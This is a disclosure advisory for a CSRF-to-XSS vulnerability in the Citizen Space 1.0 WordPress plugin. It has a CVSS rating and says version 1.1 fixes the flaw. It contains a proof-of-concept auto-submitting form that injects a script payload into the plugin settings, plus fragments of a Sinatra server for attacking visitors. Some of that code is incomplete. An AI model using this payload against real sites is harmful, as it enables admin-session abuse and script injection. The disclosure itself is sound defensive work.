XSS via CSRF in Citizen Space 1.0


Last revised:

If an attacker can convince a logged-in admin to visit a page of theirs, they can change the value of the citizenspace_url option via CSRF. That value is then inserted into the same page unescaped (citizenspace.php line 43).

<script src="//"></script>
  jQuery(function () {
<form action="http://wordpress.local/wp-admin/options-general.php?page=citizenspace" method="POST">
  <input type="hidden" name="cs_submit" value="true">
  <input type="hidden" name="citizenspace_url" value="&quot;>&lt;script>alert(String.fromCharCode(100,120,119))&lt;/script>">

XSS can also be performed against non-logged-in users by using the above method to set the URL to a valid URL you control (I used http://localhost:9999/). Then run the following Sinatra application (ruby exploit.rb -p 9999), and finally direct users to

require 'sinatra'

get '/api/1.0/citizen_space_version' do

get '/api/1.0/consult_body' do

get '/api/1.0/consult_sidebar' do

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 4.3 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality None
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Advisory timeline

Mitigation/further actions

This plugin should be upgraded immediately to version 1.1, which resolves these issues.

Special mention to the vendor, Delib, who responded extremely quickly and released an updated version just a few hours after our report.